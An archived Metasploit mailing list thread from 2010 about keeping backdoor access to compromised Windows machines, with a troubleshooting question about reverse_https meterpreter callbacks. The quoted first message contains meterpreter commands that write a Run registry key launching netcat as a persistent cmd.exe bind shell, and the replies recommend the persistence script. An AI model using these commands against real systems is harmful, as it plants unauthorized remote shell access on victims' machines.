Metasploit mailing list archives
Re: Persistent Backdoor
From: Tom Van de Wiele <tom.vandewiele () gmail com>
Date: Sat, 9 Oct 2010 23:09:10 +0200
Hi, Sort of dropping into this thread, my apologies. Persistence.rb is really recommended instead of setting regkeys individually. Unless the victim has checks for the regkeys set by persistence.rb ofcourse. I have a little issue with it, in that it runs great with e.g. a windows/meterpreter/reverse_tcp payload but has anyone experienced problems with running it with a windows/meterpreter/reverse_https payload? I'm doing a file format client directed attack with another box as an exploit/multi/handler and on that box I see the reverse connection coming in from the victim to my multi/handler. I see a tcp handshake being performed but then no data being sent by the victim. After which the connection times out. I'm using reverse_https with 443/tcp as the client connecting back has to traverse a proxy server. I have tried this in another testlab with no proxy server in between (2 machines sitting in the same lan) but I get the same behavior. Using ruby1.9.1 and build svn r10585 from 2 days ago. Thank you for sharing your experiences or any pointers on how I can diagnose this further. On Mon, Oct 4, 2010 at 3:40 PM, David Kennedy <kennedyd013 () gmail com> wrote:
Why not use run persistence from meterpreter? On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com> wrote:Hi, meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe" nor meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe" doesn't seem to work for me :-( _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Persistent Backdoor Eric (Oct 04)
- Re: Persistent Backdoor David Kennedy (Oct 04)
- Re: Persistent Backdoor John Nash (Oct 04)
- Re: Persistent Backdoor Eric (Oct 05)
- Re: Persistent Backdoor Tom Van de Wiele (Oct 09)
- Re: Persistent Backdoor Miguel Rios (Oct 10)
- Re: Persistent Backdoor Sherif El-Deeb (Oct 10)
- Re: Persistent Backdoor David Kennedy (Oct 04)